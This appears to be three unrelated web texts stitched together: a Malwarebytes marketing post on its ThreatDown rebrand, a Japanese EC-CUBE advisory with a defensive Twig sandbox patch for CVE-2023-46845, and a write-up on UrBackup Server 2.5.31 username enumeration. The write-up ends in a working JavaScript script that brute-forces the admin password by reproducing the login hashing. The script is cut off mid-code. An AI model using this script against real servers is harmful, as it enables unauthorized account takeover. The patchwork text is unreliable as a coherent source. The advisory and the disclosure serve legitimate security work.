With the release of ThreatDown, let's take a look at Malwarebytes' 15-year legacy and what's next.

November marks a significant shift in our legacy. After 15 years as Malwarebytes, we are proud to introduce our rebranded identity, ThreatDown powered by Malwarebytes.

Building off Malwarebytes’ initial recognition for removing every trace of viruses that others missed, ThreatDown powered by Malwarebytes combines award-winning technologies that cover all stages of an attack, with managed services for teams with limited resources.

To say it’s been quite a journey to this point would be an understatement. From our beginnings as a remediation consumer tool to becoming a titan in business cyber protection, let’s walk through where we’ve come and where we’re headed.

**Anti-Malware Small Business Edition (2008 – 2012)**

Malwarebytes for Business began its journey in the late 2000s, offering corporate licensing for its consumer anti-malware product. By 2012, our focus intensified as we launched the Anti-Malware Small Business Edition, introducing advanced features to meet the specific demands of businesses.

**Malwarebytes Enterprise Edition (September 2012 – 2016)**

The introduction of Malwarebytes Enterprise Edition (MEE) in late 2012 solidified our position in the enterprise market. Tailored for businesses, governments, and educational institutions, MEE provided comprehensive threat protection and malware remediation. As the demand for our expertise grew, esteemed institutions such as The University of Alabama and NextGen Healthcare became part of our clientele.

**Malwarebytes Endpoint Security (June 2014 – 2016)**

2014 saw the birth of the Anti-Malware Remediation Tool, a streamlined malware solution for businesses. Shortly after, Malwarebytes Endpoint Security was launched, merging multiple essential tools into one comprehensive package.

**Nebula (2017 – 2018)**

Transitioning into cloud security management, 2017 introduced Nebula 1.0, our cloud-based console. This platform brought together our machine learning-backed Malwarebytes Incident Response and Endpoint Protection products.

**OneView (2019)**

2019 heralded the debut of OneView, a multi-tenant console tailored for Managed Service Providers (MSPs). With OneView, MSPs could efficiently manage multiple clients’ security needs from a unified platform.

**Comprehensive Endpoint Detection and Response Offerings (2020 – 2021)**

Throughout 2020 and 2021, we fortified our EDR capabilities, including extensions to support Windows servers. With features such as Flight Recorder Search, Threat Hunting Alerts, and Brute Force Protection, we further strengthened our protective measures against cyber threats.

**Managed Detection and Response (2022)**

Last year, we delved into a multitude of new services and tools, including Device Control, Vulnerability Assessment, Patch Management Modules, and many more. Our crowning achievement was the introduction of Malwarebytes Managed Detection and Response (MDR) service, providing 24×7 monitoring and investigations for resource constrained IT teams.

**Securing The Against the Next Generation of Threats (2023 and beyond)**

2023 marked our foray into Mobile Protection for iOS, Android, and Chromebook platforms, helping organizations crush mobile threats on iOS, Android, and ChromeOS. The introduction of an Application Blocking Module gave administrators even greater control over app installations on devices.

Further, with the release of Malwarebytes Security Advisor, we transformed the Nebula customer experience to enable organizations to visualize and improve their security posture in just a few minutes. We also released Malwarebytes Managed Threat Hunting (MTH), a 24/7 service that proactively identifies and then alerts EDR customers to potential threats before an active attack begins.

**Into The Future With ThreatDown powered by Malwarebytes**

Originating from Malwarebytes’ 15-year legacy in combating daily malware threats, ThreatDown powered by Malwarebytes has evolved in tandem with the ever-changing threat landscape.

ThreatDown’s mission for businesses is straightforward: neutralize threats promptly and efficiently, without the need for extensive IT teams, prolonged setup times, or substantial budgets. We combine the technologies and services that resource constrained IT teams need into four streamlined, cost-effective bundles that take down threats, take down complexity and take down costs:

*   **ThreatDown Core Bundle**: Basic malware protection and threat surface reduction. A simple yet superior solution integrating award-winning endpoint protection technologies.
*   **ThreatDown Advanced Bundle**: Everything included in core plus Automated Threat Hunting and Ransomware Rollback. Tailored for smaller security teams with limited resources.
*   **ThreatDown Elite Bundle**: Everything in Advanced plus 24/7 expert monitoring and response by Malwarebytes MDR analysts. Purpose-built for organizations with small (to non-existent) security teams that lack the resources to address all security alerts.
*   **ThreatDown Ultimate Bundle**: Everything in Elite plus protection from categories of malicious websites. Perfect for teams looking for a SOC-in-a-box, a one-and-done shortcut to cybersecurity done right.

In short, with ThreatDown, the mission is clear: To take down threats to businesses and reduce attack surfaces immediately, without the need for an IT army or big budgets. Together, we can overpower threats—and empower IT.

Visit www.threatdown.com to learn more.

 ThreatDown powered by Malwarebytes: A 15 Year Journey 

EC-CUBE 3 series (3.0.0 to 3.0.18-p6) and 4 series (4.0.0 to 4.0.6-p3, 4.1.0 to 4.1.2-p2, and 4.2.0 to 4.2.2) contain an arbitrary code execution vulnerability due to improper settings of the template engine Twig included in the product. As a result, arbitrary code may be executed on the server where the product is running by a user with an administrative privilege.

**更新履歴**

2023/11/09 15:00

目次の追加

2023/11/07 14:00

JVNからの公表内容情報へのリンクを追加

2023/10/26 13:00

初版公開

**目次**

*   EC-CUBEにおけるRCE可能な脆弱性
*   脆弱性の概要
*   Twigの更新手順
*   修正方法1: 修正ファイルを利用する場合(4.0系)
*   修正方法2: 修正差分を確認して適宜反映する場合(4.0系)
*   問い合わせ先
*   謝辞

**EC-CUBEにおけるRCE可能な脆弱性**

EC-CUBE 4.0系におけるRCE可能な脆弱性(危険度: 低)があることが判明いたしました。

脆弱性そのものは、修正の反映によりすぐに解決するものです。  
以下のいずれかの方法により、ご対応をお願いいたします。

*   修正ファイルを適用する
*   修正差分を確認して適用する

皆様にはお手数おかけし誠に申し訳ございません。  
本脆弱性における被害報告は現時点でございませんが、できるだけ速やかにご対応をお願いいたします。

**脆弱性の概要****EC-CUBEにおけるRCE可能な脆弱性****危険度:**

低

**不具合が存在するEC-CUBEのバージョン:**

*   **4.0.0〜4.0.6-p3**

**詳細:**

該当バージョンのEC-CUBEにはRCE可能な脆弱性が存在します。EC-CUBEはテンプレートエンジンとしてTwigを利用していますが、EC-CUBEの一部画面でTwigに対する設定不備が存在し、攻撃者が対象のシステム上で任意のコードを実行できる可能性があります。

**JVNからの公表内容 (2023/11/07公開)**

JVN#29195731: EC-CUBE 3系および 4系において任意のコードを実行される脆弱性

*   EC-CUBE 3系および 4系において任意のコードを実行される脆弱性 CVE-2023-46845

**Twigの更新手順**

EC-CUBE4.0系で利用している場合、Twigの不具合によりSandBox機能が動作しません。  
修正方法を実施する前に、Twigのアップデートを行ってください。

Twigをアップデートするためには、composerを使用する方法とファイルを手動でアップデートする方法の2つがあります。  
以下のどちらかを実施してください。

*   **composerコマンドにて、Twigをアップデート:**
    
    以下のコマンドを実行し、Twigを新しいバージョンに更新してください。  
    $ composer update twig/twig  
    $ composer update twig/extensions
    
    また、以下のコマンドを実行し、Twigが更新されていることを確認してください。
    
    $ composer show twig/twig  
    ※以下のように表示されることを確認してください。  
    name : twig/twig  
    versions : \* v2.15.5
    
    $ composer show twig/extensions  
    ※以下のように表示されることを確認してください。  
    name : twig/extensions  
    versions : \* v1.5.4
    

*   **Twigのファイルを手動でアップデート:**
    
    Twigを手動でアップデートする時は、以下の手順に従ってください。
    
    twig/twigのファイルを以下のURLからダウンロードします。  
    https://github.com/twigphp/Twig/archive/refs/tags/v2.15.5.zip
    
    \[EC-CUBEの設置先\]/vendor/twig/twigディレクトリ内を削除してください。  
    ダウンロードしたZIPファイルを\[EC-CUBEの設置先\]/vendor/twig/twigディレクトリに展開してください。
    
    twig/extensionのファイルを以下のURLからダウンロードします。  
    https://github.com/twigphp/Twig-extensions/archive/refs/tags/v1.5.4.zip
    
    \[EC-CUBEの設置先\]/vendor/twig/extensionsディレクトリ内を削除してください。  
    ダウンロードしたZIPファイルを\[EC-CUBEの設置先\]/vendor/twig/extensionsディレクトリに展開してください。
    
    ファイルが正しく上書きされたことを確認してください。  
    また、EC-CUBEの動作を確認し、テンプレートが正しく表示されることを確認してください。
    

**修正方法1: 修正ファイルを利用する場合**(4.0系)****

**※本修正を実施する前に、Twigの更新を必ず行ってください。**

開発環境がある場合は、まず開発環境でお試しください。  
以下の手順に従って、修正ファイルの反映をお願いいたします。

1.  修正ファイルのダウンロード
    
    ご利用中のEC-CUBEのバージョンに該当する修正ファイルをダウンロードしてください。  
    ※EC-CUBEのバージョンはこちらの手順でご確認ください。  
    ※修正ファイルは各バージョンの最新版に対して作成しています。旧バージョンをご利用の場合は、「修正方法2」のご対応をお願いします。  
    ※対象のファイルに対して既にカスタマイズをしている場合は、「修正方法2」のご対応をお願いします。
    
    *   **修正ファイル(4.0.6-p3)** (SHA256:0bcbb847ea1aaf8443f49f30015066122ce27f253574dcc92cae4b5859a6646f)
    
    ダウンロードし、解凍していただきますと、以下の修正ファイルがあります。必ず該当するバージョンのファイルをご利用ください。
    
    **4.0.6-p3**
    *   app/config/eccube/packages/twig\_extensions.yaml
    *   src/Eccube/Resource/template/default/Product/detail.twig
    *   src/Eccube/Resource/template/default/default\_frame.twig
    *   src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php
    *   src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php
2.  EC-CUBEファイルのバックアップ
    
    あらかじめEC-CUBEファイル全体のバックアップを行ってください。  
    
3.  修正ファイルの反映
    
    以下のファイルを上書き更新してください。
    
    上書きするファイル
    
    **4.0.6-p3**
    
    *   app/config/eccube/packages/twig\_extensions.yaml
    *   src/Eccube/Resource/template/default/Product/detail.twig
    *   src/Eccube/Resource/template/default/default\_frame.twig
    *   src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php
    *   src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php
    
    下記にファイルが存在する場合は同様に上書きをお願いします
    
    *   app/template/default/Product/detail.twig
    *   app/template/default/default\_frame.twig
    
    また、snippet.twigに関してはプラグインで拡張する箇所となるため対応不要となります。
    
    ※デザインテンプレートの適用や、EC-CUBE本体のカスタマイズをしている場合、修正箇所の差分をご確認のうえ反映をお願いします。  
    ※開発環境がある場合は、開発環境での反映・動作確認を行った後に、本番環境への反映をおすすめします。
4.  キャッシュの削除
    
    EC-CUBE のキャッシュの削除が必要です。  
    EC-CUBE の管理画面にログインいただき、コンテンツ管理 -> キャッシュ管理 のページからキャッシュの削除をお願いいたします。
    
5.  動作確認
    
    フロント画面と管理画面（ログインが必要）それぞれにおいて、基本操作が正常に行えることをご確認ください。  
    

**修正方法2: 修正差分を確認して適宜反映する場合**(4.0系)****

**※本修正を実施する前に、Twigの更新を必ず行ってください。**

以下のコード差分情報を参照して頂き、必要な箇所に修正を反映してください。

本修正方法はEC-CUBE 4.0.6-p3のバージョンを例として提示しております。  
過去バージョンをご利用の場合は、下記修正対象ファイルの修正差分を参考にご対応お願いいたします。  

**修正差分**

1.  app/config/eccube/packages/twig\_extensions.yaml +143 \-0
2.  src/Eccube/Resource/template/default/Product/detail.twig +1 \-1
3.  src/Eccube/Resource/template/default/default\_frame.twig +1 \-1
4.  src/Eccube/Twig/Extension/IgnoreTwigSandboxErrorExtension.php +78 \-0
5.  src/Eccube/Twig/Sandbox/SecurityPolicyDecorator.php +47 \-0

@@ -8,3 +8,146 @@ services:

8

8

  #Twig\\Extensions\\DateExtension: ~

9

9

  Twig\\Extensions\\IntlExtension: ~

10

10

  #Twig\\Extensions\\TextExtension: ~

11

+  

12

+ eccube.twig\_sandbox.policy:

13

+ class: Twig\\Sandbox\\SecurityPolicy

14

+ arguments:

15

+ $allowedTags: "%eccube.twig\_sandbox.allowed\_tags%"

16

+ $allowedFilters: "%eccube.twig\_sandbox.allowed\_filters%"

17

+ $allowedFunctions: "%eccube.twig\_sandbox.allowed\_functions%"

18

+ $allowedMethods: "%eccube.twig\_sandbox.allowed\_methods%"

19

+ $allowedProperties: "%eccube.twig\_sandbox.allowed\_properties%"

20

+ eccube.twig\_sandbox.extension:

21

+ class: Twig\\Extension\\SandboxExtension

22

+ arguments:

23

+ \- '@eccube.twig\_sandbox.policy'

24

+ \- false

25

+ tags: \['twig.extension'\]

26

+ Eccube\\Twig\\Sandbox\\SecurityPolicyDecorator:

27

+ decorates: 'eccube.twig\_sandbox.policy'

28

+ parameters:

29

+ eccube.twig\_sandbox.allowed\_tags:

30

+ \- 'apply'

31

+ \- 'block'

32

+ \- 'deprecated'

33

+ \- 'embed'

34

+ \- 'extends'

35

+ \- 'flush'

36

+ \- 'for'

37

+ \- 'if'

38

+ \- 'set'

39

+ \- 'spaceless'

40

+ \- 'verbatim'

41

+ \- 'with'

42

+ \- 'form\_theme'

43

+ \- 'stopwatch'

44

+ \- 'trans'

45

+ \- 'trans\_default\_domain'

46

+ eccube.twig\_sandbox.allowed\_filters:

47

+ \- 'abs'

48

+ \- 'batch'

49

+ \- 'capitalize'

50

+ \- 'column'

51

+ \- 'convert\_encoding'

52

+ \- 'date'

53

+ \- 'date\_modify'

54

+ \- 'default'

55

+ \- 'escape'

56

+ \- 'first'

57

+ \- 'format'

58

+ \- 'join'

59

+ \- 'json\_encode'

60

+ \- 'keys'

61

+ \- 'last'

62

+ \- 'length'

63

+ \- 'lower'

64

+ \- 'merge'

65

+ \- 'nl2br'

66

+ \- 'number\_format'

67

+ \- 'replace'

68

+ \- 'reverse'

69

+ \- 'round'

70

+ \- 'slice'

71

+ \- 'spaceless'

72

+ \- 'split'

73

+ \- 'striptags'

74

+ \- 'title'

75

+ \- 'trim'

76

+ \- 'upper'

77

+ \- 'url\_encode'

78

+ \- 'abbr\_class'

79

+ \- 'abbr\_method'

80

+ \- 'file\_link'

81

+ \- 'format\_args'

82

+ \- 'format\_args\_as\_text'

83

+ \- 'humanize'

84

+ \- 'trans'

85

+ \- 'yaml\_dump'

86

+ \- 'yaml\_encode'

87

+ \- 'date\_day'

88

+ \- 'date\_day\_with\_weekday'

89

+ \- 'date\_format'

90

+ \- 'date\_min'

91

+ \- 'date\_sec'

92

+ \- 'doctrine\_pretty\_query'

93

+ \- 'doctrine\_replace\_query\_parameters'

94

+ \- 'e'

95

+ \- 'ellipsis'

96

+ \- 'file\_ext\_icon'

97

+ \- 'form\_encode\_currency'

98

+ \- 'format\_log\_message'

99

+ \- 'no\_image\_product'

100

+ \- 'price'

101

+ \- 'time\_ago'

102

+ \- 'doctrine\_minify\_query'

103

+ \- 'localizedcurrency'

104

+ \- 'localizeddate'

105

+ \- 'localizednumber'

106

+ \- 'transchoice'

107

+ eccube.twig\_sandbox.allowed\_functions:

108

+ \- 'cycle'

109

+ \- 'date'

110

+ \- 'max'

111

+ \- 'min'

112

+ \- 'random'

113

+ \- 'range'

114

+ \- 'absolute\_url'

115

+ \- 'asset'

116

+ \- 'asset\_version'

117

+ \- 'csrf\_token'

118

+ \- 'is\_granted'

119

+ \- 'logout\_path'

120

+ \- 'logout\_url'

121

+ \- 'path'

122

+ \- 'relative\_path'

123

+ \- 'url'

124

+ \- 'active\_menus'

125

+ \- 'class\_categories\_as\_json'

126

+ \- 'csrf\_token\_for\_anchor'

127

+ \- 'currency\_symbol'

128

+ \- 'get\_all\_carts'

129

+ \- 'get\_cart'

130

+ \- 'get\_carts\_total\_price'

131

+ \- 'get\_carts\_total\_quantity'

132

+ \- 'has\_errors'

133

+ \- 'is\_reduced\_tax\_rate'

134

+ \- 'product'

135

+ \- 'workflow\_can'

136

+ \- 'workflow\_has\_marked\_place'

137

+ \- 'workflow\_marked\_places'

138

+ \- 'workflow\_transitions'

139

+ \- 'device\_version'

140

+ \- 'full\_view\_url'

141

+ \- 'is\_android\_os'

142

+ \- 'is\_device'

143

+ \- 'is\_full\_view'

144

+ \- 'is\_ios'

145

+ \- 'is\_mobile'

146

+ \- 'is\_mobile\_view'

147

+ \- 'is\_not\_mobile\_view'

148

+ \- 'is\_tablet'

149

+ \- 'is\_tablet\_view'

150

+ eccube.twig\_sandbox.allowed\_methods:

151

+ 'Symfony\\Bridge\\Twig\\AppVariable': \[ 'getrequest' \]

152

+ 'Symfony\\Component\\HttpFoundation\\Request': \[ 'geturi' \]

153

+ eccube.twig\_sandbox.allowed\_properties: \[\]

@@ -375,7 +375,7 @@ file that was distributed with this source code.

375

375

  </div>

376

376

  {% if Product.freearea %}

377

377

  <div class="ec-productRole\_\_description">

378

\- {{ include(template\_from\_string(Product.freearea)) }}

378

+ {{ include(template\_from\_string(Product.freearea), sandboxed = true) }}

379

379

  </div>

380

380

  {% endif %}

381

381

  </div>

@@ -28,7 +28,7 @@ file that was distributed with this source code.

28

28

  <meta name="robots" content="{{ Page.meta\_robots }}">

29

29

  {% endif %}

30

30

  {% if Page.meta\_tags is not empty %}

31

\- {{ include(template\_from\_string(Page.meta\_tags)) }}

31

+ {{ include(template\_from\_string(Page.meta\_tags), sandboxed = true) }}

32

32

  {% endif %}

33

33

  <link rel="icon" href="{{ asset('assets/img/common/favicon.ico', 'user\_data') }}">

34

34

  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css" integrity="sha384-HSMxcRTRxnN+Bdg0JdbxYKrThecOKuH5zCYotlSAcp1+c8xmyTe9GYg1l9a69psu" crossorigin="anonymous">

@@ -0,0 +1,78 @@

1

+ <?php

2

+  

3

+ /\*

4

+ \* This file is part of EC-CUBE

5

+ \*

6

+ \* Copyright(c) EC-CUBE CO.,LTD. All Rights Reserved.

7

+ \*

8

+ \* http://www.ec-cube.co.jp/

9

+ \*

10

+ \* For the full copyright and license information, please view the LICENSE

11

+ \* file that was distributed with this source code.

12

+ \*/

13

+  

14

+ namespace Eccube\\Twig\\Extension;

15

+  

16

+ use Twig\\Environment;

17

+ use Twig\\Error\\LoaderError;

18

+ use Twig\\Extension\\AbstractExtension;

19

+ use Twig\\Extension\\SandboxExtension;

20

+ use Twig\\Sandbox\\SecurityError;

21

+ use Twig\\TwigFunction;

22

+  

23

+ /\*\*

24

+ \* \\vendor\\twig\\twig\\src\\Extension\\CoreExtension の拡張

25

+ \*/

26

+ class IgnoreTwigSandboxErrorExtension extends AbstractExtension

27

+ {

28

+ /\*\*

29

+ \* {@inheritdoc}

30

+ \*/

31

+ public function getFunctions(): array

32

+ {

33

+ return \[

34

+ new TwigFunction('include', \[$this, 'twig\_include'\], \['needs\_environment' => true, 'needs\_context' => true, 'is\_safe' => \['all'\]\]),

35

+ \];

36

+ }

37

+  

38

+ /\*\*

39

+ \* twig sandboxの例外を操作します

40

+ \* app\_env = devの場合、エラーを表示する

41

+ \* app\_env = prodの場合、エラーを表示しない

42

+ \*

43

+ \* @param Environment $env

44

+ \* @param $context

45

+ \* @param $template

46

+ \* @param $variables

47

+ \* @param $withContext

48

+ \* @param $ignoreMissing

49

+ \* @param $sandboxed

50

+ \*

51

+ \* @return string|void

52

+ \*

53

+ \* @throws LoaderError

54

+ \* @throws SecurityError

55

+ \*/

56

+ public function twig\_include(Environment $env, $context, $template, $variables = \[\], $withContext = true, $ignoreMissing = false, $sandboxed = false)

57

+ {

58

+ try {

59

+ return \\twig\_include($env, $context, $template, $variables, $withContext, $ignoreMissing, $sandboxed);

60

+ } catch (SecurityError $e) {

61

+  

62

+ // devではエラー画面が表示されるようにする

63

+ $appEnv = env('APP\_ENV');

64

+ if ($appEnv === 'dev') {

65

+ throw $e;

66

+ } else {

67

+ // ログ出力

68

+ log\_warning($e->getMessage(), \['exception' => $e\]);

69

+  

70

+ // 例外がスローされた場合、sandboxが効いた状態になってしまうため追加

71

+ $sandbox = $env->getExtension(SandboxExtension::class);

72

+ if (!$sandbox->isSandboxedGlobally()) {

73

+ $sandbox->disableSandbox();

74

+ }

75

+ }

76

+ }

77

+ }

78

+ }

@@ -0,0 +1,47 @@

1

+ <?php

2

+  

3

+ /\*

4

+ \* This file is part of EC-CUBE

5

+ \*

6

+ \* Copyright(c) EC-CUBE CO.,LTD. All Rights Reserved.

7

+ \*

8

+ \* http://www.ec-cube.co.jp/

9

+ \*

10

+ \* For the full copyright and license information, please view the LICENSE

11

+ \* file that was distributed with this source code.

12

+ \*/

13

+  

14

+ namespace Eccube\\Twig\\Sandbox;

15

+  

16

+ use Twig\\Sandbox\\SecurityPolicy as BasePolicy;

17

+ use Twig\\Sandbox\\SecurityPolicyInterface;

18

+  

19

+ class SecurityPolicyDecorator implements SecurityPolicyInterface {

20

+  

21

+ /\*\* @var BasePolicy \*/

22

+ private $securityPolicy;

23

+  

24

+ public function \_\_construct(BasePolicy $securityPolicy)

25

+ {

26

+ $this->securityPolicy = $securityPolicy;

27

+ }

28

+  

29

+ public function checkSecurity($tags, $filters, $functions)

30

+ {

31

+ $this->securityPolicy->checkSecurity($tags, $filters, $functions);

32

+ }

33

+  

34

+ public function checkMethodAllowed($obj, $method)

35

+ {

36

+ // \_\_toStringの場合はチェックをスキップする

37

+ if ($method === '\_\_toString') {

38

+ return;

39

+ }

40

+ $this->securityPolicy->checkMethodAllowed($obj, $method);

41

+ }

42

+  

43

+ public function checkPropertyAllowed($obj, $method)

44

+ {

45

+ $this->securityPolicy->checkPropertyAllowed($obj, $method);

46

+ }

47

+ }

**問い合わせ先**

本脆弱性に関するお問合せ：

EC-CUBE 運営チーム  
MAIL: support@ec-cube.net

**謝辞**

本脆弱性は、

*   株式会社エヌ・エフ・ラボラトリーズ 三浦 剛様

よりご報告いただきました。  
この場をお借りして、厚く御礼申し上げます。

CVE-2023-46845: EC-CUBE4系におけるRCE可能な脆弱性(JVN#29195731)

UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid.

Starting with the first step, access the login page at localhost:55414. The login page includes fields for username and password, and it lacks captcha or any other controls to prevent automated form submissions. We observed that this allows perpetrators to brute-force the login request.

Next, we begin to understand how UrBackup works. We first try using the username "root". The result shows that "User does not exist". From this, we can easily deduce that this user does not exist.

We then try using a common username credential that might be used by most administrators, which can be found here. If we are lucky, the admin might be using one of the existing usernames from the wordlist similar to my demonstration, which shows that the username "admin" exists; however, the popup indicates "Wrong password".

The first request is sent to /x?a=salt and the response contains a cryptographic setting

The cryptographic JavaScript function that performs a password calculation is located on the client side.

1\. Prepare a list of existing usernames (in this case "admin")

2\. Prepare a password wordlist (in this case is "pass.txt")

3\. Run below code to automate brute-force

    
    
    import axios from 'axios';
    import fs from 'fs/promises';
    import qs from 'qs';  
    import sjcl from 'sjcl';
    import { HttpProxyAgent } from 'http-proxy-agent';
    
                   const proxyAgent = new HttpProxyAgent('http://127.0.0.1:8080');
    var blks = null;
    var nblk = null;
    var i = null;
    var x = null;
    var a = null;
    var b = null;
    var c = null;
    var d = null;
    var olda = null;
    var oldb = null;
    var oldc = null;
    var oldd = null;
    var str = null;
    var j = null;
    var hex_chr = "0123456789abcdef";
    function rhex(num)
    {
      str = "";
      for(j = 0; j <= 3; j++)
        str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) +
               hex_chr.charAt((num >> (j * 8)) & 0x0F);
      return str;
    }
    function str2blks_MD5(str)
    {
      nblk = ((str.length + 8) >> 6) + 1;
      blks = new Array(nblk * 16);
      for(i = 0; i < nblk * 16; i++) blks[i] = 0;
      for(i = 0; i < str.length; i++)
        blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
      blks[i >> 2] |= 0x80 << ((i % 4) * 8);
      blks[nblk * 16 - 2] = str.length * 8;
      return blks;
    }
    function add(x, y)
    {
      var lsw = (x & 0xFFFF) + (y & 0xFFFF);
      var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
      return (msw << 16) | (lsw & 0xFFFF);
    }
    function rol(num, cnt)
    {
      return (num << cnt) | (num >>> (32 - cnt));
    }
    function cmn(q, a, b, x, s, t)
    {
      return add(rol(add(add(a, q), add(x, t)), s), b);
    }
    function ff(a, b, c, d, x, s, t)
    {
      return cmn((b & c) | ((~b) & d), a, b, x, s, t);
    }
    function gg(a, b, c, d, x, s, t)
    {
      return cmn((b & d) | (c & (~d)), a, b, x, s, t);
    }
    function hh(a, b, c, d, x, s, t)
    {
      return cmn(b ^ c ^ d, a, b, x, s, t);
    }
    function ii(a, b, c, d, x, s, t)
    {
      return cmn(c ^ (b | (~d)), a, b, x, s, t);
    }
    function calcMD5(str)
    {
      x = str2blks_MD5(str);
      a =  1732584193;
      b = -271733879;
      c = -1732584194;
      d =  271733878;
      for(i = 0; i < x.length; i += 16)
      {
        olda = a;
        oldb = b;
        oldc = c;
        oldd = d;
        a = ff(a, b, c, d, x[i+ 0], 7 , -680876936);
        d = ff(d, a, b, c, x[i+ 1], 12, -389564586);
        c = ff(c, d, a, b, x[i+ 2], 17,  606105819);
        b = ff(b, c, d, a, x[i+ 3], 22, -1044525330);
        a = ff(a, b, c, d, x[i+ 4], 7 , -176418897);
        d = ff(d, a, b, c, x[i+ 5], 12,  1200080426);
        c = ff(c, d, a, b, x[i+ 6], 17, -1473231341);
        b = ff(b, c, d, a, x[i+ 7], 22, -45705983);
        a = ff(a, b, c, d, x[i+ 8], 7 ,  1770035416);
        d = ff(d, a, b, c, x[i+ 9], 12, -1958414417);
        c = ff(c, d, a, b, x[i+10], 17, -42063);
        b = ff(b, c, d, a, x[i+11], 22, -1990404162);
        a = ff(a, b, c, d, x[i+12], 7 ,  1804603682);
        d = ff(d, a, b, c, x[i+13], 12, -40341101);
        c = ff(c, d, a, b, x[i+14], 17, -1502002290);
        b = ff(b, c, d, a, x[i+15], 22,  1236535329);    
        a = gg(a, b, c, d, x[i+ 1], 5 , -165796510);
        d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
        c = gg(c, d, a, b, x[i+11], 14,  643717713);
        b = gg(b, c, d, a, x[i+ 0], 20, -373897302);
        a = gg(a, b, c, d, x[i+ 5], 5 , -701558691);
        d = gg(d, a, b, c, x[i+10], 9 ,  38016083);
        c = gg(c, d, a, b, x[i+15], 14, -660478335);
        b = gg(b, c, d, a, x[i+ 4], 20, -405537848);
        a = gg(a, b, c, d, x[i+ 9], 5 ,  568446438);
        d = gg(d, a, b, c, x[i+14], 9 , -1019803690);
        c = gg(c, d, a, b, x[i+ 3], 14, -187363961);
        b = gg(b, c, d, a, x[i+ 8], 20,  1163531501);
        a = gg(a, b, c, d, x[i+13], 5 , -1444681467);
        d = gg(d, a, b, c, x[i+ 2], 9 , -51403784);
        c = gg(c, d, a, b, x[i+ 7], 14,  1735328473);
        b = gg(b, c, d, a, x[i+12], 20, -1926607734);
        
        a = hh(a, b, c, d, x[i+ 5], 4 , -378558);
        d = hh(d, a, b, c, x[i+ 8], 11, -2022574463);
        c = hh(c, d, a, b, x[i+11], 16,  1839030562);
        b = hh(b, c, d, a, x[i+14], 23, -35309556);
        a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
        d = hh(d, a, b, c, x[i+ 4], 11,  1272893353);
        c = hh(c, d, a, b, x[i+ 7], 16, -155497632);
        b = hh(b, c, d, a, x[i+10], 23, -1094730640);
        a = hh(a, b, c, d, x[i+13], 4 ,  681279174);
        d = hh(d, a, b, c, x[i+ 0], 11, -358537222);
        c = hh(c, d, a, b, x[i+ 3], 16, -722521979);
        b = hh(b, c, d, a, x[i+ 6], 23,  76029189);
        a = hh(a, b, c, d, x[i+ 9], 4 , -640364487);
        d = hh(d, a, b, c, x[i+12], 11, -421815835);
        c = hh(c, d, a, b, x[i+15], 16,  530742520);
        b = hh(b, c, d, a, x[i+ 2], 23, -995338651);
        a = ii(a, b, c, d, x[i+ 0], 6 , -198630844);
        d = ii(d, a, b, c, x[i+ 7], 10,  1126891415);
        c = ii(c, d, a, b, x[i+14], 15, -1416354905);
        b = ii(b, c, d, a, x[i+ 5], 21, -57434055);
        a = ii(a, b, c, d, x[i+12], 6 ,  1700485571);
        d = ii(d, a, b, c, x[i+ 3], 10, -1894986606);
        c = ii(c, d, a, b, x[i+10], 15, -1051523);
        b = ii(b, c, d, a, x[i+ 1], 21, -2054922799);
        a = ii(a, b, c, d, x[i+ 8], 6 ,  1873313359);
        d = ii(d, a, b, c, x[i+15], 10, -30611744);
        c = ii(c, d, a, b, x[i+ 6], 15, -1560198380);
        b = ii(b, c, d, a, x[i+13], 21,  1309151649);
        a = ii(a, b, c, d, x[i+ 4], 6 , -145523070);
        d = ii(d, a, b, c, x[i+11], 10, -1120210379);
        c = ii(c, d, a, b, x[i+ 2], 15,  718787259);
        b = ii(b, c, d, a, x[i+ 9], 21, -343485551);
        a = add(a, olda);
        b = add(b, oldb);
        c = add(c, oldc);
        d = add(d, oldd);
      }
      console.log(rhex(a) + rhex(b) + rhex(c) + rhex(d));
      return rhex(a) + rhex(b) + rhex(c) + rhex(d);
    }
    
    const main = async () => {
        try {
            const passwords = await fs.readFile('pass.txt', 'utf8');
            const passwordArray = passwords.split('\n').map(pw => pw.trim());
            for (const password of passwordArray) {
                console.log(password)
              
                const url1 = 'http://localhost:55414/x?a=salt';
                const data1 = qs.stringify({
                    username: 'admin',
                    ses: '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                });
                const response1 = await axios.post(url1, data1, {
                    headers: {
                        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Accept-Language": "en-US,en;q=0.5",
                        "Accept-Encoding": "gzip, deflate",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
                        "X-Requested-With": "XMLHttpRequest",
                        "Origin": "http://localhost:55414",
                        "Referer": "http://localhost:55414"
                    },httpAgent: proxyAgent,  
                    httpsAgent: proxyAgent 
                });
                console.log(response1.data);
                const { rnd, salt, ses } = response1.data;
                if (!rnd || !salt) {
                    console.log('Failed to retrieve rnd or salt');
                    continue;
                }
    
                let pwmd5 = calcMD5(salt + password);
                if (10000 > 0) {
                    pwmd5 = sjcl.codec.hex.fromBits(sjcl.misc.pbkdf2(sjcl.codec.hex.toBits(pwmd5), salt, 10000));
                }
                pwmd5 = calcMD5(rnd + pwmd5); 
                const url2 = 'http://localhost:55414/x?a=login';
                const data2 = {
                    username: 'admin',
                    password: pwmd5,
                    ses: ses || '4Eu9JKihHNT6CH8esJQ0mn3ga9G7vJ',
                    lang: 'en'
                };
                
                const response2 = await axios.post(url2, qs.stringify(data2), {  
                    headers: {
                        "Accept": "application/json, text/javascript, */*; q=0.01",
                        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",  
                        "sec-ch-ua": '"Not;A Brand";v="99", "Chromium";v="106"',
                        "X-Requested-With": "XMLHttpRequest",
                        "sec-ch-ua-mobile": "?0",
